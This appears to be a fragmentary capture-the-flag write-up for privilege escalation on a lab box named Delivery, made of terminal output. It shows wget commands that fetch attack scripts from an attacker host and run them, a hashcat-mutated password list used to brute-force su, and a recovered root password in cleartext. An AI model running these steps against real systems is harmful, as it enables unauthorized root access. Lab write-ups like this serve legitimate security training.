Priv Esc

Youve_G0t_Mail!

maildeliverer@Delivery:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    /root/mail.sh
#

maildeliverer@Delivery:~$ wget http://10.10.14.18/sudodoom
--2025-02-23 15:05:49--  http://10.10.14.18/sudodoom
Connecting to 10.10.14.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2362 (2.3K) [text/plain]
Saving to: ‘sudodoom’

sudodoom                                        100%[=====================================================================================================>]   2.31K  --.-KB/s    in 0.01s

2025-02-23 15:05:49 (188 KB/s) - ‘sudodoom’ saved [2362/2362]

maildeliverer@Delivery:~$ chmod +x sudodoom

maildeliverer@Delivery:~$ ./sudodoom -i 10.10.14.18 -p 80

/dev/shm/pspy64

 hashcat --force pass.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --stdout | sort -u > mut_password.list

maildeliverer@Delivery:/dev/shm$ wget 10.10.14.18/suBF.sh && wget http://10.10.14.18:8080/mut_password.list && chmod +x suBF.sh
--2025-02-23 21:47:59--  http://10.10.14.18/suBF.sh
Connecting to 10.10.14.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2340 (2.3K) [text/x-sh]
Saving to: ‘suBF.sh’

suBF.sh                 100%[==============================>]   2.29K  --.-KB/s    in 0.008s

2025-02-23 21:47:59 (284 KB/s) - ‘suBF.sh’ saved [2340/2340]

--2025-02-23 21:47:59--  http://10.10.14.18:8080/mut_password.list
Connecting to 10.10.14.18:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 62343 (61K) [application/octet-stream]
Saving to: ‘mut_password.list’

mut_password.list       100%[==============================>]  60.88K   329KB/s    in 0.2s

2025-02-23 21:47:59 (329 KB/s) - ‘mut_password.list’ saved [62343/62343]

root:PleaseSubscribe!21